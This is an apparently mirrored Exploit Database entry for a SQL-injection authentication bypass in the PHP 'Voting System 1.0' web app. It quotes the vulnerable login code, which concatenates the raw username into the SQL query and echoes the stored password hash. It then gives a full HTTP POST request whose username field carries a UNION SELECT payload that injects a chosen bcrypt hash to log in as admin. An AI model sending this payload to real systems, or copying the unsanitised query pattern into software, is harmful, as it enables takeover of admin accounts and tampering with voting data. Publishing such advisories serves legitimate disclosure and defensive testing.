Voting System 1.0 – Authentication Bypass (SQLI)

• Exploit Database
• 98 阅读

• 作者： secure77
  日期： 2021-05-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49843/

• # Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI)
  # Date: 06/05/2021
  # Exploit Author: secure77
  # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
  # Version: 1.0
  # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
  
  You can simply bypass the /admin/login.php with the following sql injection.
  All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing
  
  
  
  ########################### Vulnerable code ############################
  if(isset($_POST['login'])){
  	$username = $_POST['username'];
  	$password = $_POST['password'];
  
  	$sql = "SELECT * FROM admin WHERE username = '$username'";
  	$query = $conn->query($sql);
  
  	if($query->num_rows < 1){
  		$_SESSION['error'] = 'Cannot find account with the username';
  	}
  	else{
  		$row = $query->fetch_assoc();
  		echo "DB Password: " . $row['password'];
  		echo "<br>";
  		echo "<br>";
  		echo "Input Password: " . $password;
  		if(password_verify($password, $row['password'])){
  			echo "Equal";
  			$_SESSION['admin'] = $row['id'];
  		}
  		else{
  			echo "not Equal";
  			$_SESSION['error'] = 'Incorrect password';
  		}
  	}
  	
  }
  else{
  	$_SESSION['error'] = 'Input admin credentials first';
  }
  
  ########################### Payload ############################
  POST /admin/login.php HTTP/1.1
  Host: 192.168.1.1
  DNT: 1
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
  Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 167
  
  login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
  

  Python

  Copy